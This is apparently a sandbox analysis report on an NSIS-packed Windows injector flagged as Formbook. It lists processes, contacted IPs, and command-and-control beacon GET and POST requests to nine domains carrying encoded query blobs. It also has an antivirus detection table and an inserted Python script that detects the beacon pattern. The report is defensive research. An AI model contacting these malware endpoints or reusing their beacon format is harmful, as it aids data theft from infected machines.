Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Jan. 28, 2023, 10:49 p.m. | Jan. 28, 2023, 11:02 p.m. |
Process | Command line | PID |
---|---|---|
nucctjtro.exe | "C:\Users\test22\AppData\Local\Temp\nucctjtro.exe" C:\Users\test22\AppData\Local\Temp\twuhpin.dvd | 2128 |
nucctjtro.exe | "C:\Users\test22\AppData\Local\Temp\nucctjtro.exe" | 2220 |
IP Address | Status |
---|---|
104.21.76.77 | Active |
143.92.48.236 | Active |
162.0.216.254 | Active |
164.124.101.2 | Active |
199.59.243.222 | Active |
2.57.90.16 | Active |
211.149.132.144 | Active |
217.70.184.50 | Active |
45.33.6.223 | Active |
66.112.211.168 | Active |
66.96.147.160 | Active |
Suricata Alerts
Suricata TLS
No Suricata TLS
section | .ndata (the data section NSIS-built installers carry; consistent with the NSIS packer/injector verdicts in the AV table below) |
Suspicious feature | Suspicious request |
---|---|
GET method with no useragent header | GET http://www.bts-exhibition20.com/gbhu/?dwq11ePF=tpqPZatFSWftMZbuFeOnBOSwBNRYNC4bECF+5KuudrHZL+uj6SAhnLM79xl9TgWodfNUMHSE7zon0vuCBBc1ktEpBF17jxL0iiyPMLM=&YabdMo=eHFLyxLS9HiIq |
GET method with no useragent header | GET http://www.actualabaule.com/gbhu/?dwq11ePF=2pxLiO942t5FkFRjNHyAiMW5bHO63rkjCdflxXdQmiqtiPUBqVrUFlO8JTqg/bEqxMzFYZexGJrShELInTuzWAoQXV3U24qzi0sYkgA=&YabdMo=eHFLyxLS9HiIq |
GET method with no useragent header | GET http://www.govcintria.online/gbhu/?dwq11ePF=dVbA+IXcm1YuOJ1N0YfoPOUPspwoFrMI8eGyv/hTd7M6maCfXa3GNmu+O7MNTYOdhYiwJPdemCWc8/TOWhgps6HIHGnlIWhMsDwJ9t4=&YabdMo=eHFLyxLS9HiIq |
GET method with no useragent header | GET http://www.49138.net/gbhu/?dwq11ePF=WL2v/sGFsFIuAk53tX4v3ozaI9MekZ54iiHcVmD4RVE9irnVRUhCIdhzHcX9OStZFhWObZgZr940JPQfa5eUhFHz/csG7i5yqe9ZH20=&YabdMo=eHFLyxLS9HiIq |
GET method with no useragent header | GET http://www.dongshi88.com/gbhu/?dwq11ePF=b1ijv7/tEC2PXjxDsbuxsXva2wZ3D1czsA+lhOYVJxZEUWwbEdFBMQFsyzcPw/mr8NXL74lT/Fd9q4Dp8JhY/9JDjuMN4js97XFbSws=&YabdMo=eHFLyxLS9HiIq |
GET method with no useragent header | GET http://www.adalexs.com/gbhu/?dwq11ePF=D1b/tXE1wqN7p4mfTi76DPsviRaFjnrtscBWiPbYkZ2JHeEtyHLUC4ibH92W8gaDc10nQ7RDCV1MC1LMji13NdslOWFcPJvVlGENFow=&YabdMo=eHFLyxLS9HiIq |
GET method with no useragent header | GET http://www.bobblehead8.com/gbhu/?dwq11ePF=meqTUx5kIEeA9O3K+DspA+9TJQ7rWtYm9pdGl178RL9fSiIP48l7cIqKAbR6uI16zGzDWzC2kHM4w1/jD5NrA8QTbIMv2qGMhL2x80Q=&YabdMo=eHFLyxLS9HiIq |
GET method with no useragent header | GET http://www.bordain.website/gbhu/?dwq11ePF=Z0JOfegcJus8QT/ga7HhKsxVghDCE41qFhckdElZvPNE+U6wFU3FpNVOM7LfjIcK+KFXTjs52Dx2xmlkwnBEWQpZ+ijccONCTZsjAaQ=&YabdMo=eHFLyxLS9HiIq |
GET method with no useragent header | GET http://www.defituesday.com/gbhu/?dwq11ePF=K8gb+vg3lIj7mLsgY2s/Un2w4+nCuuuuWVhNes+vUVynttvh63W50QdwpB+jXhqV1vb6jBT4NlQZn884uDSkCA0C7jdkyYeP3Sv4iJE=&YabdMo=eHFLyxLS9HiIq |
request | GET http://www.bts-exhibition20.com/gbhu/?dwq11ePF=tpqPZatFSWftMZbuFeOnBOSwBNRYNC4bECF+5KuudrHZL+uj6SAhnLM79xl9TgWodfNUMHSE7zon0vuCBBc1ktEpBF17jxL0iiyPMLM=&YabdMo=eHFLyxLS9HiIq |
request | GET http://www.sqlite.org/2022/sqlite-dll-win32-x86-3390000.zip |
request | POST http://www.actualabaule.com/gbhu/ |
request | GET http://www.actualabaule.com/gbhu/?dwq11ePF=2pxLiO942t5FkFRjNHyAiMW5bHO63rkjCdflxXdQmiqtiPUBqVrUFlO8JTqg/bEqxMzFYZexGJrShELInTuzWAoQXV3U24qzi0sYkgA=&YabdMo=eHFLyxLS9HiIq |
request | POST http://www.govcintria.online/gbhu/ |
request | GET http://www.govcintria.online/gbhu/?dwq11ePF=dVbA+IXcm1YuOJ1N0YfoPOUPspwoFrMI8eGyv/hTd7M6maCfXa3GNmu+O7MNTYOdhYiwJPdemCWc8/TOWhgps6HIHGnlIWhMsDwJ9t4=&YabdMo=eHFLyxLS9HiIq |
request | POST http://www.49138.net/gbhu/ |
request | GET http://www.49138.net/gbhu/?dwq11ePF=WL2v/sGFsFIuAk53tX4v3ozaI9MekZ54iiHcVmD4RVE9irnVRUhCIdhzHcX9OStZFhWObZgZr940JPQfa5eUhFHz/csG7i5yqe9ZH20=&YabdMo=eHFLyxLS9HiIq |
request | POST http://www.dongshi88.com/gbhu/ |
request | GET http://www.dongshi88.com/gbhu/?dwq11ePF=b1ijv7/tEC2PXjxDsbuxsXva2wZ3D1czsA+lhOYVJxZEUWwbEdFBMQFsyzcPw/mr8NXL74lT/Fd9q4Dp8JhY/9JDjuMN4js97XFbSws=&YabdMo=eHFLyxLS9HiIq |
request | POST http://www.adalexs.com/gbhu/ |
request | GET http://www.adalexs.com/gbhu/?dwq11ePF=D1b/tXE1wqN7p4mfTi76DPsviRaFjnrtscBWiPbYkZ2JHeEtyHLUC4ibH92W8gaDc10nQ7RDCV1MC1LMji13NdslOWFcPJvVlGENFow=&YabdMo=eHFLyxLS9HiIq |
request | POST http://www.bobblehead8.com/gbhu/ |
request | GET http://www.bobblehead8.com/gbhu/?dwq11ePF=meqTUx5kIEeA9O3K+DspA+9TJQ7rWtYm9pdGl178RL9fSiIP48l7cIqKAbR6uI16zGzDWzC2kHM4w1/jD5NrA8QTbIMv2qGMhL2x80Q=&YabdMo=eHFLyxLS9HiIq |
request | POST http://www.bordain.website/gbhu/ |
request | GET http://www.bordain.website/gbhu/?dwq11ePF=Z0JOfegcJus8QT/ga7HhKsxVghDCE41qFhckdElZvPNE+U6wFU3FpNVOM7LfjIcK+KFXTjs52Dx2xmlkwnBEWQpZ+ijccONCTZsjAaQ=&YabdMo=eHFLyxLS9HiIq |
request | POST http://www.defituesday.com/gbhu/ |
request | GET http://www.defituesday.com/gbhu/?dwq11ePF=K8gb+vg3lIj7mLsgY2s/Un2w4+nCuuuuWVhNes+vUVynttvh63W50QdwpB+jXhqV1vb6jBT4NlQZn884uDSkCA0C7jdkyYeP3Sv4iJE=&YabdMo=eHFLyxLS9HiIq |
request | POST http://www.actualabaule.com/gbhu/ |
request | POST http://www.govcintria.online/gbhu/ |
request | POST http://www.49138.net/gbhu/ |
request | POST http://www.dongshi88.com/gbhu/ |
request | POST http://www.adalexs.com/gbhu/ |
request | POST http://www.bobblehead8.com/gbhu/ |
request | POST http://www.bordain.website/gbhu/ |
request | POST http://www.defituesday.com/gbhu/ |
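The request list above shows the two things worth keying detection on: a GET with no User-Agent header, and the same URI shape (path `/gbhu/`, query parameters `dwq11ePF` and `YabdMo`, the first carrying a long base64-looking blob) sent to nine unrelated domains, paired with a POST to the same path on each. The following triage script is an added example, not part of the sandbox report; it takes a list of (method, URL, headers) records, flags GETs without a User-Agent, flags query values that look like base64 blobs, and clusters requests by path plus parameter names so that one signature recurring across many hosts stands out. The URLs in the sample are taken from the report; the header dictionaries are constructed assumptions, since the report does not reproduce request headers (the sqlite.org download is given a User-Agent only to show a non-flagged request).

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: (method, url, headers). URLs come from the report above;
# the header dicts are assumptions, the report only flags "no useragent header".
SAMPLE_REQUESTS = [
    ("GET", "http://www.bts-exhibition20.com/gbhu/?dwq11ePF=tpqPZatFSWftMZbuFeOnBOSwBNRYNC4bECF+5KuudrHZL+uj6SAhnLM79xl9TgWodfNUMHSE7zon0vuCBBc1ktEpBF17jxL0iiyPMLM=&YabdMo=eHFLyxLS9HiIq", {}),
    ("POST", "http://www.actualabaule.com/gbhu/", {}),
    ("GET", "http://www.actualabaule.com/gbhu/?dwq11ePF=2pxLiO942t5FkFRjNHyAiMW5bHO63rkjCdflxXdQmiqtiPUBqVrUFlO8JTqg/bEqxMzFYZexGJrShELInTuzWAoQXV3U24qzi0sYkgA=&YabdMo=eHFLyxLS9HiIq", {}),
    ("POST", "http://www.govcintria.online/gbhu/", {}),
    ("GET", "http://www.govcintria.online/gbhu/?dwq11ePF=dVbA+IXcm1YuOJ1N0YfoPOUPspwoFrMI8eGyv/hTd7M6maCfXa3GNmu+O7MNTYOdhYiwJPdemCWc8/TOWhgps6HIHGnlIWhMsDwJ9t4=&YabdMo=eHFLyxLS9HiIq", {}),
    ("GET", "http://www.49138.net/gbhu/?dwq11ePF=WL2v/sGFsFIuAk53tX4v3ozaI9MekZ54iiHcVmD4RVE9irnVRUhCIdhzHcX9OStZFhWObZgZr940JPQfa5eUhFHz/csG7i5yqe9ZH20=&YabdMo=eHFLyxLS9HiIq", {}),
    # Assumed to carry a normal User-Agent so the example has a request that is not flagged.
    ("GET", "http://www.sqlite.org/2022/sqlite-dll-win32-x86-3390000.zip", {"User-Agent": "Mozilla/5.0"}),
]

# Base64 alphabet, at least 16 characters, optional "=" padding.
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def query_pairs(query):
    """Split a query string into (name, value) pairs WITHOUT percent- or plus-decoding.
    urllib.parse.parse_qsl would turn the '+' inside a base64 blob into a space."""
    return [pair.partition("=")[::2] for pair in query.split("&") if pair]


def missing_user_agent(method, headers):
    """True for a GET that carries no User-Agent header (names compared case-insensitively)."""
    names = {name.lower() for name in headers}
    return method.upper() == "GET" and "user-agent" not in names


def request_signature(url):
    """(path, sorted parameter names): the part of a beacon URL that stays constant
    while the host and the parameter values change from request to request."""
    parts = urlsplit(url)
    names = tuple(sorted(name for name, _ in query_pairs(parts.query)))
    return parts.path, names


def has_base64_blob(url, min_len=64):
    """True if any query value is a base64-looking string of at least min_len characters."""
    values = (value for _, value in query_pairs(urlsplit(url).query))
    return any(len(v) >= min_len and BASE64_RE.match(v) for v in values)


def cluster_by_signature(requests):
    """Map each (path, parameter-names) signature to the set of hosts it was sent to."""
    hosts = defaultdict(set)
    for _method, url, _headers in requests:
        hosts[request_signature(url)].add(urlsplit(url).hostname)
    return hosts


def beacon_candidates(requests, min_hosts=3):
    """Signatures seen against at least min_hosts distinct hosts: one URI shape hitting
    many unrelated domains is the rotating-C2/decoy-domain pattern in the report."""
    clusters = cluster_by_signature(requests)
    return {sig: sorted(h) for sig, h in clusters.items() if len(h) >= min_hosts}


def triage(requests, min_hosts=3):
    """Run all three checks and return the findings as plain data."""
    return {
        "no_user_agent": [url for m, url, h in requests if missing_user_agent(m, h)],
        "base64_query": [url for _, url, _ in requests if has_base64_blob(url)],
        "beacon_signatures": beacon_candidates(requests, min_hosts),
    }


if __name__ == "__main__":
    findings = triage(SAMPLE_REQUESTS)
    print(f"GET without User-Agent: {len(findings['no_user_agent'])}")
    print(f"Base64-looking query values: {len(findings['base64_query'])}")
    for (path, params), hosts in findings["beacon_signatures"].items():
        print(f"signature path={path} params={params} hosts={len(hosts)}")
        for host in hosts:
            print(f"  {host}")
```

The host clustering is the check that survives domain rotation: blocking the nine domains listed above buys little, but a rule on "same path and parameter names to N or more hosts in one session" catches the next list as well. The POSTs to `/gbhu/` cluster separately (no query parameters), so with the four hosts in the constructed sample only the GET signature crosses the default threshold of three.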
file | C:\Users\test22\AppData\Local\Temp\nucctjtro.exe |
host | 104.21.76.77 |
Vendor | Detection |
---|---|
Lionic | Trojan.Win32.Generic.4!c |
Elastic | malicious (high confidence) |
MicroWorld-eScan | Trojan.GenericKD.65205746 |
FireEye | Generic.mg.f5ba8cd2153faf89 |
McAfee | RDN/Generic.dx |
Cylance | Unsafe |
K7AntiVirus | Riskware ( 0040eff71 ) |
Alibaba | Trojan:Win32/Redcap.e666870d |
Cybereason | malicious.2941bb |
Arcabit | Trojan.Generic.D3E2F5F2 |
Cyren | W32/ABRisk.DRNF-3156 |
Symantec | Packed.NSISPacker!g14 |
ESET-NOD32 | a variant of Win32/Injector_AGen.QG |
APEX | Malicious |
Kaspersky | UDS:DangerousObject.Multi.Generic |
BitDefender | Trojan.GenericKD.65205746 |
Avast | Win32:InjectorX-gen [Trj] |
Sophos | Mal/Generic-S |
F-Secure | Trojan.TR/Redcap.iqtst |
DrWeb | Trojan.Loader.1278 |
VIPRE | Trojan.GenericKD.65205746 |
McAfee-GW-Edition | BehavesLike.Win32.Dropper.fc |
Emsisoft | Trojan.GenericKD.65205746 (B) |
SentinelOne | Static AI - Suspicious PE |
Webroot | W32.Trojan.GenKD |
Detected | |
Avira | TR/AD.GenShell.qwxpn |
MAX | malware (ai score=88) |
Antiy-AVL | Trojan/Win32.Formbook |
Gridinsoft | Trojan.Win32.Downloader.sa |
Microsoft | Trojan:Win32/Casdet!rfn |
ZoneAlarm | HEUR:Trojan-Spy.Win32.Noon.gen |
GData | Trojan.GenericKD.65205746 |
Cynet | Malicious (score: 100) |
AhnLab-V3 | Trojan/Win.NSISInject.R495658 |
Acronis | suspicious |
BitDefenderTheta | Gen:NN.ZexaF.36212.fqW@aGhmtkei |
ALYac | Gen:Variant.Lazy.263633 |
Malwarebytes | Trojan.Injector |
TrendMicro-HouseCall | TROJ_GEN.R002H0DAR23 |
Rising | Trojan.Injector!8.C4 (TFE:5:4WZSEkuvkMG) |
Ikarus | Trojan.Inject |
Fortinet | W32/Injector_AGen.QG!tr |
AVG | Win32:InjectorX-gen [Trj] |
Panda | Trj/GdSda.A |